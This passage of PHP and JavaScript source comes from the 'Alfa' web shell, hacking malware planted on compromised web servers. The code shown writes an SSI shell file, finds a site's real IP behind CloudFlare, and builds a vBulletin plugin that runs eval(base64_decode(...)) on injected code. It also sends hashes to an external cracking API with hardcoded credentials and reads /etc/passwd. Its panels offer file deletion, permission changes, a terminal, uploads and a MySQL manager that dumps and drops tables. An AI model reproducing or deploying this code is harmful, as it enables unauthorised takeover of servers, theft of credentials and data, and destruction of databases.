jwJdrGc1T3krHHwaql8AX5r129zKl5ij3TqpKCqarIaUSBlnOoHz2V1RT7Srt/JpfXdX9m0Rny6Wf9h9LxKFHrYjkwZcexGMS8T2h91KvyQdQup7/Du0gLf69wjt9KwCnySa7flNUX0BxLYtrTSL7X0oJEk2EVNrJj1yuonaNf+T3Z9I/WtfTrmv9WuHXul2ovK/tz6Hw==';
2157@__write_file('alfa_ssi.shtml',__get_resource($code));
2158@chmod("alfa_ssi.shtml",0755);
2159echo AlfaiFrameCreator('alfa_shtml/alfa_ssi.shtml');
2160echo '</div>';
2161alfafooter();
2162}
2163function alfacloudflare(){
2164alfahead();
2165AlfaNum(8,9,10,7,6,5,4,3);
2166echo "<div class=header><center><br><div class='txtfont_header'>| Cloud Flare ByPasser |</div><br><form action='' onsubmit=\"g('cloudflare',null,this.url.value,'>>'); return false;\" method='post'>
2167<p><div class='txtfont'>Target:</div> <input type='text' size=30 name='url' style='text-align:center;' placeholder=\"target.com\"> <input type='submit' name='go' value=' ' /></p></form></center>";
2168if($_POST['alfa2'] && $_POST['alfa2'] == '>>'){
2169$url = $_POST['alfa1'];
2170if(!preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url)){
2171$url = preg_replace('/^(https?):\/\//', '', $url);
2172$url = "http://www.".$url;
2173}
2174$headers = @get_headers($url, 1);
2175$server = $headers['Server'];
2176$subs = array('owa.','2tty.','m.','gw.','mx1.','store.','1','2','vb.','news.','download.','video','cpanel.', 'ftp.', 'server1.', 'cdn.', 'cdn2.', 'ns.', 'ns3.', 'mail.', 'webmail.', 'direct.', 'direct-connect.', 'record.', 'ssl.', 'dns.', 'help.', 'blog.', 'irc.', 'forum.', 'dl.', 'my.', 'cp.', 'portal.', 'kb.', 'support.','search.', 'docs.', 'files.', 'accounts.', 'secure.', 'register.', 'apps.', 'beta.', 'demo.', 'smtp.', 'ns2.', 'ns1.', 'server.', 'shop.', 'host.', 'web.', 'cloud.', 'api.', 'exchange.', 'app.', 'vps.', 'owa.', 'sat.', 'bbs.', 'movie.', 'music.', 'art.', 'fusion.', 'maps.', 'forums.', 'acc.', 'cc.', 'dev.', 'ww42.', 'wiki.', 'clients.', 'client.','books.','answers.','service.','groups.','images.','upload.','up.','tube.','users.','admin.','administrator.','private.','design.','whmcs.','wp.','wordpress.','joomla.','vbulletin.','test.','developer.','panel.','contact.');
2177if(preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url, $matches)){
2178if($matches[2] != 'www'){$url = preg_replace('/^(https?):\/\//', '', $url);}else{
2179$url = explode($matches[0], $url);
2180$url = $url[1];}}
2181if(is_array($server))$server = $server[0];
2182echo __pre();
2183if(preg_match('/cloudflare/i', $server))
2184echo "\n[+] CloudFlare detected: {$server}\n<br>";
2185else
2186echo "\n[+] CloudFlare wasn't detected, proceeding anyway.\n";
2187echo '[+] CloudFlare IP: ' . is_ipv4(gethostbyname($url)) . "\n\n<br><br>";
2188echo "[+] Searching for more IP addresses.\n\n<br><br>";
2189for($x=0;$x<count($subs);$x++){
2190$site = $subs[$x] . $url;
2191$ip = is_ipv4(gethostbyname($site));
2192if($ip == '(Null)')
2193continue;
2194echo "Trying {$site}: {$ip}\n<br>";
2195}
2196echo "\n[+] Finished.\n<br>";
2197}
2198echo '</div>';
2199alfafooter();
2200}
2201function is_ipv4($ip){
2202return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? $ip : '(Null)';
2203}
2204function __alert($s){
2205echo '<center>'.__pre().$s.'</center>';
2206}
2207function create_table($data){
2208echo '<table border="1">';
2209foreach ($data as $key => $val){
2210$array = array();
2211foreach($val as $k => $v){
2212$array[$k] = $v;
2213}
2214echo "<tr><td><div class='tbltxt'>".$array['tdName']."</div></td><td><input type='text' id='".$array['id']."' name='".$array['inputName']."' ".($array['placeholder']?'placeholder':'value')."='".$array['inputValue']."' size='".$array['inputSize']."' ".($array['disabled']?'disabled':'')."></td></tr>";
2215}
2216echo '</table>';
2217}
2218function alfaphp2xml(){
2219alfahead();
2220AlfaNum(8,9,10,7,6,5,4,3);
2221echo "<div class=header><center><p><div class='txtfont_header'>| Shell For vBulletin |</div></p><form onsubmit=\"g('php2xml',null,this.code.value,'>>'); return false;\" method='post'>
2222<p><br><textarea rows='12' cols='70' type='text' name='code' placeholder=\"insert your shell code\"></textarea><br/><br/>
2223<input type='submit' name='go' value=' ' /></p></form></center>";
2224if($_POST['alfa2']&&$_POST['alfa2']=='>>'){
2225echo __pre()."<p><center><textarea rows='10' name='users' cols='80'>";
2226echo '<?xml version="1.0" encoding="ISO-8859-1"?><plugins><plugin active="1" product="vbulletin"><title>vBulletin</title><hookname>init_startup</hookname><phpcode><![CDATA[if (strpos($_SERVER[\'PHP_SELF\'],"subscriptions.php")){eval(base64_decode(\''.__ZW5jb2Rlcg($_POST['alfa1']).'\'));exit;}]]></phpcode></plugin></plugins>';
2227echo '</textarea></center></p>';
2228}
2229echo '</center></div>';
2230alfafooter();
2231}
2232function alfacpcrack(){
2233alfahead();
2234echo '<div class=header><center><p><div class="txtfont_header">| Hash Tools |</div></p><h3><a href=javascript:void(0) onclick="g(\'cpcrack\',null,\'dec\')">| DeCrypter | </a><a href=javascript:void(0) onclick="g(\'cpcrack\',null,\'analyzer\')">| Hash Analyzer | </a></h3></center>';
2235if($_POST['alfa1']=='dec'){
2236$algorithms = array('md5'=>'MD5','md4'=>'MD4','sha1'=>'SHA1','sha256'=>'SHA256','sha384'=>'SHA384','sha512'=>'SHA512','ntlm'=>'NTLM');
2237echo '<center><div class="txtfont_header">| DeCrypter |</div><br><br>
2238<form onsubmit="g(\'cpcrack\',null,\'dec\',this.md5.value,\'>>\',this.alg.value); return false;"><div class="txtfont">Decrypt Method:</div> <select name="alg" style="width:100px;">';
2239foreach($algorithms as $key=>$val){echo('<option value="'.$key.'">'.$val.'</option>');}
2240echo'</select><input type="text" placeholder="Hash" name="md5" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>';
2241if($_POST['alfa3'] == '>>'){
2242$hash = $_POST['alfa2'];
2243if(!empty($hash)){
2244$hash_type = $_POST['alfa4'];
2245$email = "solevisible@gmail.com";
2246$code = "7b9fa79f92c3cd96";
2247$target = "https://md5decrypt.net/Api/api.php?hash=".$hash."&hash_type=".$hash_type."&email=".$email."&code=".$code;
2248$resp = @file_get_contents($target);
2249if($resp==''){
2250$get = new AlfaCURL();
2251$resp = $get->Send($target);
2252}
2253echo __pre().'<center>';
2254switch($resp){
2255 case('CODE ERREUR : 001'):echo "<b><font color='red'>You exceeded the 400 allowed request per day</font></b>";break;
2256 case('CODE ERREUR : 003'):echo "<b><font color='red'>Your request includes more than 400 hashes.</font></b>";break;
2257 case('CODE ERREUR : 004'):echo "<b><font color='red'>The type of hash you provide in the argument hash_type doesn't seem to be valid</font></b>";break;
2258 case('CODE ERREUR : 005'):echo "<b><font color='red'>The hash you provide doesn't seem to match with the type of hash you set.</font></b>";break;
2259}
2260if(substr($resp,0,4)!='CODE'&&$resp!=''){
2261echo "<b>Result: <font color='green'>".$resp."</font></b>";
2262}elseif(substr($resp,0,4)!='CODE'){
2263echo "<font color='red'>NoT Found</font><br />";
2264}
2265echo('</center>');
2266}
2267}
2268}
2269if($_POST['alfa1']=='analyzer'){
2270echo '<center><p><div class="txtfont_header">| Hash Analyzer |</div></p>
2271<form onsubmit="g(\'cpcrack\',null,\'analyzer\',this.hash.value,\'>>\');return false;">
2272<div class="txtfont">Hash: </div> <input type="text" placeholder="Hash" name="hash" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>';
2273if($_POST['alfa3'] == '>>'){
2274$hash = $_POST['alfa2'];
2275if(!empty($hash)){
2276$curl = new AlfaCURL();
2277$resp = $curl->Send("https://md5decrypt.net/en/HashFinder/","post","hash={$hash}&crypt=Search");
2278echo(__pre().'<center>');
2279if(preg_match('#<fieldset class="trouve">(.*?)</fieldset>#',$resp,$s)){
2280 echo('<font color="green">'.$s[1].'</font>');
2281}else{
2282 echo('<font color="red">Not Found...!</font>');
2283}
2284echo('</center><br>');
2285}
2286}
2287}
2288echo '</div>';
2289alfafooter();
2290}
2291function alfafooter(){
2292if(!isset($_POST['ajax'])){
2293echo "<table class='foot' width='100%' border='0' cellspacing='3' cellpadding='0' >
2294<tr>
2295<td width='17%'><form onsubmit=\"if(this.f.value.trim().length==0)return false;editor(this.f.value,'mkfile','','','','file');this.f.value='';return false;\"><span class='footer_text'>Make File : </span><br><input class='dir' type='text' name='f' value=''> <input type='submit' value=' '></form></td>
2296<td width='21%'><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);this.d.value='';return false;\"><span class='footer_text'>Make Dir : </span><br><input class='dir' type='text' name='d' value=' '> <input type='submit' value=' '></form></td>
2297<td width='22%'><form onsubmit=\"g('FilesMan',null,'delete',this.del.value);this.del.value='';return false;\"><span class='footer_text'>Delete : </span><br><input class='dir' type='text' name='del' value=' '> <input type='submit' value=' '></form></td>
2298<td width='19%'><form onsubmit=\"if(this.f.value.trim().length==0)return false;editor(this.f.value,'chmod','','','','none');this.f.value='';return false;\"><span class='footer_text'>Chmod : </span><br><input class='dir' type=text name=f value=' '> <input type='submit' value=' '></form></td>
2299</tr>
2300<tr>
2301<td colspan='2'><form onsubmit='g(\"FilesMan\",this.c.value,\"\");return false;'><span class='footer_text'>Change Dir : </span><br><input class='foottable' id='footer_cwd' type='text' name='c' value='".htmlspecialchars($GLOBALS['cwd'])."'> <input type='submit' value=' '></form></td>
2302<td colspan='2'><form onsubmit=\"editor(this.file.value,'view','','','','file');return false;\"><span><span class='footer_text'>Read File : </span></span><br><input class='foottable' type='text' name='file' value='/etc/passwd'> <input type='submit' value=' '></form></td>
2303</tr>
2304<tr>
2305<td colspan='4'><form style='margin-top: 10px;' onsubmit=\"return false;\" autocomplete='off'><span><span class='footer_text'>Execute :</span><br><button onClick='alfaOpenPhpTerminal();return false;' class='foottable alfa_custom_cmd_btn'><img style='width:28px;vertical-align: middle;' src='http://solevisible.com/icons/menu/terminal.svg'> Terminal</button><br></form></td>
2306</tr>
2307<tr>
2308<td colspan='4'><form onsubmit='u(this);return false;' name='footer_form' method='post' ENCTYPE='multipart/form-data'>
2309<input type='hidden' name='a' value='FilesMAn'>
2310<input type='hidden' name='c' value='" . $GLOBALS['cwd'] ."'>
2311<input type='hidden' name='ajax' value='true'>
2312<input type='hidden' name='alfa1' value='uploadFile'>
2313<input type='hidden' name='charset' value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
2314<span class='footer_text'>Upload file: </span><span><button id='addup' onclick='addnewup();return false;'><b>+</b></button></span><p id='pfooterup'><label class='inputfile' for='footerup'><span id='__fnameup'></span> <strong> Choose a file</strong></label><input id='footerup' class='toolsInp' type='file' name='f[]' onChange='handleup(this,0);' multiple></p><input type='submit' name='submit' value=' '></form><div id='alfa-copyright'><span class='copyright'>[ ./AlfaTeam © 2012-".date('Y')." ]</span><br><span><a href='javascript:void(0);' onclick='alert(\"BTC: 1KLty8LUqnqsXkM3Qkvy2Kpv4gLt7Ugcyo\");' style='color: #E91E63;text-decoration: none;'>Donate Us !</a></span> <span style='letter-spacing: 2px;color: #dfff00;'>solevisible[at]gmail.com</span> <span><a style='color: #ff6060;text-decoration: none;' target='_blank' href='https://telegram.me/solevisible'>@solevisible</a></span></div></td>
2315</tr>
2316</table>
2317</div>
2318
2319<div id='options_window' style='background:rgba(0, 0, 0, 0.69);'><div class='editor-wrapper'><div class='editor-header'><div class='opt-title'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"options_window\");'></div><div onClick='editorClose(\"options_window\");' class='close-button'></div></div></div><div style='height:100%;' class='content_options_holder'><div class='options_tab'></div><div class='options_content' style='margin-left:14px;margin-right:30px;background:#000;overflow:auto;'></div></div></div></div>
2320
2321<div id='database_window' style='background:rgba(0, 0, 0, 0.69);'><div class='editor-wrapper'><div class='editor-header'><div class='opt-title'>Sql Manager</div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"database_window\");'></div><div onClick='editorClose(\"database_window\");' class='close-button'></div></div></div><div class='content_options_holder' style='margin-left:14px;margin-right:30px;background:#000;max-height:90%;'><div class='sql-tabs'></div><div class='sql-contents' style='max-height: 85vh;'></div></div></div></div>
2322
2323<div id='cgiloader'><div class='editor-wrapper'><div class='editor-header'><div class='opt-title'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"cgiloader\");'></div><div onClick='editorClose(\"cgiloader\");' class='close-button'></div></div></div><div id='cgiframe' style='position:relative;margin-left:14px;margin-right:30px;'><div class='terminal-tabs'></div><div style='height:90%;' class='terminal-contents'></div></div></div></div>
2324<div id='editor' style='display:none;'><div class='editor-wrapper'><div class='editor-header'><div class='editor-path'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"editor\");'></div><div onClick='editorClose(\"editor\");' class='close-button'></div></div></div><div onclick='historyPanelController(this);' mode='visible' class='history-panel-controller'><<</div><div class='editor-explorer'><div class='hheader'><div class='history-clear' onclick='clearEditorHistory();'>Clear all</div><div class='hheader-text'>History</div><div class='editor-search'><input type='text' style='text-align:center;' id='search-input' placeholder='search'></div></div><div class='history-list'></div></div><div class='editor-modal'><div class='editor-body'><div class='editor-content'><div class='editor-tabs'></div><div class='editor-content-holder'></div></div></div></div></div></div>
2325<div id='update-content'></div>
2326<div id='database_window-minimized' onclick='showEditor(\"database_window\");'><div class='minimized-wrapper'><span class='options_min_badge'>0</span><div class='minimized-text' style='top: 15px;'>Database</div></div></div>
2327<div id='options_window-minimized' onclick='showEditor(\"options_window\");'><div class='minimized-wrapper'><span class='options_min_badge'>0</span><div style='top: 4px;' class='minimized-text'>Options</div></div></div>
2328<div id='editor-minimized' onclick='showEditor(\"editor\");'><div class='minimized-wrapper'><span class='options_min_badge'>0</span><div style='top: 2px;' class='minimized-text'>Editor</div></div></div>
2329<div id='cgiloader-minimized' onclick='showEditor(\"cgiloader\");'><div class='minimized-wrapper'><span class='options_min_badge'>0</span><div style='top: 12px;' class='minimized-text'>Cgi Shell</div></div></div>
2330<div id='rightclick_menu'>
2331 <a target='_blank' href='' name='newtab'><img src=\"http://solevisible.com/icons/menu/newtab.svg\"> Open in new tab</a>
2332 <a target='_blank' href='' name='link'><img src=\"http://solevisible.com/icons/menu/link.svg\"> Open file directly</a>
2333 <a href='javascript:void(0);' name='download'><img src=\"http://solevisible.com/icons/menu/download2.svg\"> Download</a>
2334 <a href='' name='view'><img src=\"http://solevisible.com/icons/menu/view.svg\"> View</a>
2335 <a href='javascript:void(0);' onclick='alfaSyncMenuToOpt(this);' path='' fname='' name='view_archive'><img src=\"http://solevisible.com/icons/menu/view.svg\"> View Archive</a>
2336 <a href='' name='edit'><img src=\"http://solevisible.com/icons/menu/edit.svg\"> Edit</a>
2337 <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"move\");' ftype='' path='' fname='' href='' href='' name='move'><img src=\"http://solevisible.com/icons/menu/move.svg\"> Move</a>
2338 <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"copy\");' ftype='' path='' fname='' href='' name='copy'><img src=\"http://solevisible.com/icons/menu/copy.svg\"> Copy</a>
2339 <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"rename\");' ftype='' path='' fname='' name='rename'><img src=\"http://solevisible.com/icons/menu/rename.svg\"> Rename</a>
2340 <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"modify\");' ftype='' path='' fname='' name='modify'><img src=\"http://solevisible.com/icons/menu/time.svg\"> Modify</a>
2341 <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"permission\");' name='permission'><img src=\"http://solevisible.com/icons/menu/key.svg\"> Change Permissions</a>
2342 <a href='javascript:void(0);' onclick='alfaSyncMenuToOpt(this);' path='' fname='' name='compress'><img src=\"http://solevisible.com/icons/menu/resize.svg\"> Compress</a>
2343 <a href='javascript:void(0);' onclick='alfaSyncMenuToOpt(this);' path='' fname='' name='extract'><img src=\"http://solevisible.com/icons/menu/increase.svg\"> Extract</a>
2344 <a href='javascript:void(0);' name='delete'><img src=\"http://solevisible.com/icons/menu/delete.svg\"> Delete</a>
2345</div>
2346<div id=\"filesman-tab-full-path\"></div>
2347<div id='alert-area' class='alert-area'></div>
2348<div class='cl-popup-fixed' style='display:none;'>
2349 <div id='shortcutMenu-holder'>
2350 <div class='popup-head'></div>
2351 <form autocomplete='off' onSubmit='return false;'>
2352 <label class='old-path-lbl'></label>
2353 <div style='overflow: hidden;white-space: nowrap;text-overflow: ellipsis;' class='old-path-content'></div>
2354 <label style='margin-top:10px;' class='new-filename-lbl'>New file name</label>
2355 <input type='text' name='fname'>
2356 <div class='perm-table-holder'>
2357 <table>
2358 <tbody>
2359 <tr>
2360 <td><b>Mode</b></td>
2361 <td>User</td>
2362 <td>Group</td>
2363 <td>World</td>
2364 </tr>
2365 <tr>
2366 <td>Read</td>
2367 <td><input type='checkbox' name='ur' value='4' onclick='calcperm();'></td>
2368 <td><input type='checkbox' name='gr' value='4' onclick='calcperm();'></td>
2369 <td><input type='checkbox' name='wr' value='4' onclick='calcperm();'></td>
2370 </tr>
2371 <tr>
2372 <td>Write</td>
2373 <td><input type='checkbox' name='uw' value='2' onclick='calcperm();'></td>
2374 <td><input type='checkbox' name='gw' value='2' onclick='calcperm();'></td>
2375 <td><input type='checkbox' name='ww' value='2' onclick='calcperm();'></td>
2376 </tr>
2377 <tr>
2378 <td>Execute</td>
2379 <td><input type='checkbox' name='ux' value='1' onclick='calcperm();'></td>
2380 <td><input type='checkbox' name='gx' value='1' onclick='calcperm();'></td>
2381 <td><input type='checkbox' name='wx' value='1' onclick='calcperm();'></td>
2382 </tr>
2383 <tr>
2384 <td>Permission</td>
2385 <td><input style='width:60px;' type='text' name='u' maxlength='1' oninput='this.value=this.value.replace(/[^0-7]/g,0);autoCheckPerms(this.value, \"u\", [\"u\"]);'></td>
2386 <td><input style='width:60px;' type='text' name='g' maxlength='1' oninput='this.value=this.value.replace(/[^0-7]/g,0);autoCheckPerms(this.value, \"g\", [\"g\"]);'></td>
2387 <td><input style='width:60px;' type='text' name='w' maxlength='1' oninput='this.value=this.value.replace(/[^0-7]/g,0);autoCheckPerms(this.value, \"w\", [\"w\"]);'></td>
2388 </tr>
2389 </tbody>
2390 </table>
2391 </div>
2392
2393 </form>
2394 <div class='popup-foot'>
2395 <button style='background: #2b5225;' name='accept' action='' onclick='alfaPopUpDoAction(this);'></button>
2396 <button style='background: #9e2c2c;' onclick='d.querySelector(\".cl-popup-fixed\").style.display=\"none\";'>Cancell</button>
2397 </div>
2398 </div>
2399</div>";?>
2400<script>
2401function alfaMysqlApi(e,t){var a={host:mysql_cache[e.db_id].host,user:mysql_cache[e.db_id].user,pass:mysql_cache[e.db_id].pass,db:e.db_target,db_id:e.db_id};if(e.hasOwnProperty("db_info"))for(var i in e.db_info)a[i]=e.db_info[i];var l={a:alfab64("Sql_manager_api"),c_:alfab64(c_),alfa1:alfab64(JSON.stringify(a))};if(e.hasOwnProperty("post"))for(var i in e.post.hasOwnProperty("alfa2")&&"load_data"!=e.post.alfa2&&"page"!=e.post.alfa2&&(d.querySelector("#"+e.db_id+" .mysql-query-result-header .mysql-query-pager").innerHTML="",d.querySelector("#"+e.db_id+" .mysql-query-result-header .mysql-query-reporter").innerHTML=""),e.post)l[i]=alfab64(e.post[i]);var r="";for(var o in l)r+=o+"="+l[o]+"&";alfaloader(e.db_id,"block"),_Ajax(d.URL,r,function(a){alfaloader(e.db_id,"none"),t(a)},!0,e.db_id)}function alfaMysqlFilterTable(e,t){setTimeout(function(){var a="",i="",l=(a="","");if(null!=e)a=e.getAttribute("target"),i=e.getAttribute("db_id"),l=e.value;else a=t.target,i=t.db_id,l=t.value;l=new RegExp(l,"i"),d.querySelectorAll("#"+i+" "+a+" ul > li").forEach(function(e){var t=e.querySelector(".mysql_tables");if(null==t)return!1;-1==(t=t.innerText).search(l)?e.style.display="none":e.style.display="block"})},200)}function alfaMysqlFilterAllTable(e,t){var a=e.getAttribute("db_id"),i=d.querySelector("#"+a+" .mysql-tables input[name=filter_all]").value,l=d.querySelector("#"+a+" input[name=sql_count]").checked,r=[],o=[];if(d.querySelectorAll("#"+a+" .mysql-tables .list_container").forEach(function(e){var t=e.getAttribute("mode"),a=e.getAttribute("db_name");"no"==t&&r.push(a),o.push(a)}),r.length>0){if(0==i.length&&void 0===t)return!1;alfaMysqlApi({db_id:a,db_target:r[0],ajax_id:"mysql_get_all_tables",db_info:{databases:r},post:{alfa2:"load_all_tables",alfa3:l}},function(r){if(0!=r.length){for(var o in r=JSON.parse(r)){var n=o,s=d.querySelector("#"+a+" .cls-"+n);alfaMysqlMakeTblList(r[o],s,a,n,l)}void 0===t?alfaMysqlFilterTable(null,{db_id:a,target:".mysql-tables .list_container",value:i}):(e.setAttribute("mode","opened"),d.querySelector("#"+a+" .mysql-tables .parent-expander img").src="http://solevisible.com/icons/menu/b_minus.png")}})}else if(void 0===t)for(var n in alfaMysqlFilterTable(null,{db_id:a,target:".mysql-tables .list_container",value:i}),o)alfaMysqlTableMode(a,o[n],"closed");else{var s="",c=e.getAttribute("mode");for(var n in"opened"==c?(e.setAttribute("mode","closed"),s="b_plus.png"):(e.setAttribute("mode","opened"),s="b_minus.png"),o)alfaMysqlTableMode(a,o[n],c);d.querySelector("#"+a+" .mysql-tables .parent-expander img").src="http://solevisible.com/icons/menu/"+s}}function alfaMysqlTableMode(e,t,a){var i=d.querySelector("#"+e+" .cls-"+t),l="";void 0===a?(l=-1!=i.classList.value.indexOf("hide-db-tables")?"b_minus.png":"b_plus.png",i.classList.toggle("hide-db-tables")):"opened"==a?(l="b_plus.png",i.classList.add("hide-db-tables")):(l="b_minus.png",i.classList.remove("hide-db-tables")),d.querySelector("#"+e+" .cls-"+t+"-expander img").src="http://solevisible.com/icons/menu/"+l}function alfaMysqlExpander(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=e.getAttribute("sql_count"),l=d.querySelector("#"+a+" .cls-"+t);"loaded"==l.getAttribute("mode")?alfaMysqlTableMode(a,t):alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_get_tables",post:{alfa2:"load_tables",alfa3:i}},function(e){0!=e.length&&alfaMysqlMakeTblList(e=JSON.parse(e),l,a,t,i)})}function alfaMysqlTablesEvil(e){var t=e.getAttribute("target"),a=e.getAttribute("db_id"),i=e.getAttribute("mode");"checked"==i?(i=!1,e.setAttribute("mode","not")):(i=!0,e.setAttribute("mode","checked")),d.querySelectorAll("#"+a+" "+t+" input[name=tbl\\[\\]]").forEach(function(e){e.checked=i})}function alfaMysqlTablesDumpDrop(e){var t=e.getAttribute("target"),a=e.getAttribute("db_id"),i="none";"dump"==e.value&&(i="block"),d.querySelector("#"+a+" "+t+" .dump-file-holder").style.display=i}function alfaMysqlTablesDumpDropBtn(e){var t=e.getAttribute("target"),a=e.getAttribute("db_target"),i=e.getAttribute("db_id"),l=[],r=d.querySelector("#"+i+" input[name=sql_count]").checked,o=d.querySelector("#"+i+" "+t),n=o.querySelector("select[name=tables_evil]").value,s=o.querySelector(".dump-file-holder input").value;d.querySelectorAll("#"+i+" "+t+" input[name=tbl\\[\\]]").forEach(function(e){e.checked&&l.push(e.value)}),l.length>0&&alfaMysqlApi({db_id:i,db_target:a,ajax_id:"mysql_query_evil",db_info:{tables:l,mode:n,dump_file:s},post:{alfa2:"dump_drop"}},function(e){0!=e.length&&(e=JSON.parse(e),"drop"==n?alfaMysqlMakeTblList(e,o,i,a,r):o.querySelector(".dump-file-holder").insertAdjacentHTML("beforeend","<div><a href='javascript:void(0);' onclick='g(\"FilesTools\",null,\""+s+'","download");\'><span>Download: '+s+"</span></a></div>"))})}function alfaMysqlMakeTblList(e,t,a,i,l){t.setAttribute("mode","loaded");var r='<ul><li><div class="block"><i></i><b></b></div><div><input style="padding: 0;margin-left: 11px;text-align:center;" type="text" class="db-opt-id" db_id="'+a+'" placeholder="Filter Table" target=".cls-'+i+'" onkeyup="alfaMysqlFilterTable(this);" name="filter"></div></li>';for(var o in e)null!=e[o]&&(r+="<li><div class='block'><i></i><b></b></div><div class='tables-row'><input type='checkbox' name='tbl[]' value='"+e[o].name+"'> <a class='db-opt-id' db_target='"+i+"' db_id='"+a+"' href='javascript:void(0);' onclick=\"alfaLoadTableData(this, '"+e[o].name+"')\"><span class='mysql_tables' style='font-weight:unset;'>"+e[o].name+"</span></a>"+(l?" <small><span style='font-weight:unset;' class='mysql_table_count'>("+e[o].count+")</span></small>":" ")+"</div></li>");r+='</ul><div style="margin-left: 26px;margin-bottom: 10px;margin-top: 10px;"><input onchange="alfaMysqlTablesEvil(this);" db_id="'+a+'" class="db-opt-id" target=".cls-'+i+'" type="checkbox" class="db-opt-id"><select onchange="alfaMysqlTablesDumpDrop(this);" class="db-opt-id" db_id="'+a+'" target=".cls-'+i+'" class="db-opt-id" name="tables_evil" style="padding: 0;width: 100px;"><option selected>drop</option><option>dump</option></select> <button onclick="alfaMysqlTablesDumpDropBtn(this);return false;" db_id="'+a+'" class="db-opt-id" db_target="'+i+'" target=".cls-'+i+'" class="db-opt-id">Do it</button><div class="dump-file-holder" style="display:none;margin-left:20px;margin-top: 5px;"><input style="padding: 0;text-align:center;" type="text" placeholder="dump.sql" name="dump_file"></div></div>',t.innerHTML=r,d.querySelector("#"+a+" .cls-"+i+"-expander img").src="http://solevisible.com/icons/menu/b_minus.png"}function alfaMysqlQuery(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=d.querySelector("#"+a+" textarea[name=query]").value;alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_load_query_data",db_info:{query:i},post:{alfa2:"query"}},function(e){0!=e.length&&(e=JSON.parse(e),alfaMysqlReportBuilder(a,e),d.querySelector("#"+a+" .mysql-query-table").innerHTML=e.status?e.table:"",alfaMysqlTabCtl({child:1,db_id:a,target:".mysql-query-result-content"},!0))})}function alfaMysqlReportBuilder(e,t){var a="";t.status||(a="<div><span>Error: </span><div style='padding-left: 50px;'><pre>"+t.error+"</pre></div></div>");var i="<div><span>Query:</span><div style='padding-left: 50px;'><pre>"+t.query+"</pre></div>"+a+"</div>";d.querySelector("#"+e+" .mysql-query-reporter").innerHTML=i}function alfaMysqlTablePanelCtl(e){var t=e.getAttribute("db_id"),a=(t=e.getAttribute("db_id"),d.querySelector("#"+t)),i=a.querySelector(".tables-panel-ctl");"none"==i.getAttribute("mode")?(a.querySelector(".mysql-tables").style.display="block",i.setAttribute("mode","block"),i.innerHTML="<<",a.querySelector(".mysql-query-results-fixed").classList.remove("mysql-query-results-fixed")):(a.querySelector(".mysql-tables").style.display="none",i.setAttribute("mode","none"),i.innerHTML=">>",a.querySelector(".mysql-query-results").classList.add("mysql-query-results-fixed")),i.classList.toggle("tables-panel-ctl-min")}function alfaMysqlTabCtl(e,t){var a=void 0===t?e.getAttribute("db_id"):e.db_id,i=void 0===t?e.getAttribute("target"):e.target;d.querySelectorAll("#"+a+" .mysql-query-content").forEach(function(e){e.classList.add("mysql-hide-content")}),d.querySelector("#"+a+" .mysql-query-result-tabs .mysql-query-selected-tab").classList.remove("mysql-query-selected-tab"),void 0===t?e.classList.add("mysql-query-selected-tab"):d.querySelector("#"+a+" .mysql-query-result-tabs div:nth-child("+e.child+")").classList.add("mysql-query-selected-tab"),d.querySelector("#"+a+" "+i).classList.remove("mysql-hide-content")}function alfaLoadTableData(e,t){var a=e.getAttribute("db_target"),i=e.getAttribute("db_id");alfaMysqlApi({db_id:i,db_target:a,ajax_id:"mysql_load_table_data",db_info:{table:t},post:{alfa2:"load_data"}},function(e){if(0!=e.length){e=JSON.parse(e);var l="",r="<table border='1'><tr style='text-align: left;background-color: #305b8e;color:#FFFFFF;'><th>Column</th><th>Type</th><th>Value</th></tr>",o="<table border='1'><tr style='text-align: left;background-color: #305b8e;color:#FFFFFF;'><th>Column</th><th>Type</th><th>Value</th><th>Change</th></tr>",n="<table border='1'><tr style='text-align: left;background-color: #305b8e;color:#FFFFFF;'><th>Column</th><th>Type</th><th>Collation</th><th>Operator</th><th>Value</th></tr>",s=["int","smallint","bigint","tinyint","mediumint"],c=["longtext","text","mediumtext","tinytext"];for(var u in e.columns){var p="text";-1!=s.indexOf(e.columns[u].data_type)&&(p="number"),n+="<tr><th style='text-align: left;'>"+e.columns[u].name+"</th><td>"+e.columns[u].type+"</td><td>"+e.columns[u].collation+"</td><td><select name='"+e.columns[u].name+"'><option value='='>=</option><option value='!='>!=</option><option value='>'>></option><option value='>='>>=</option><option value='<'><</option><option value='<='><=</option><option value=\"= ''\">= ''</option><option value=\"!= ''\">!= ''</option><option value='LIKE'>LIKE</option><option value='LIKE %...%'>LIKE %...%</option><option value='NOT LIKE'>NOT LIKE</option><option value='REGEXP'>REGEXP</option><option value='REGEXP ^...$'>REGEXP ^...$</option><option value='NOT REGEXP'>NOT REGEXP</option><option value='IN (...)'>IN (...)</option><option value='NOT IN (...)'>NOT IN (...)</option><option value='BETWEEN'>BETWEEN</option><option value='NOT BETWEEN'>NOT BETWEEN</option><option value='IS NULL'>IS NULL</option><option value='IS NOT NULL'>IS NOT NULL</option></select></td><td><input type='"+p+"' name='"+e.columns[u].name+"'></td></tr>";var f=alfaMysqlLoadDataType(e.columns[u].data_type);null==e.columns[u].type_value&&(e.columns[u].type_value=""),o+="<tr><th style='text-align: left;'>"+e.columns[u].name+"</th><td><select name='sel_"+e.columns[u].name+"'>"+f+"</select></td><td><input name='value_"+e.columns[u].name+"' type='text' value='"+(-1==c.indexOf(e.columns[u].data_type)?e.columns[u].type_value:"")+"'></td><td><button col_name='"+e.columns[u].name+"' tbl_name='"+t+"' db_id='"+i+"' 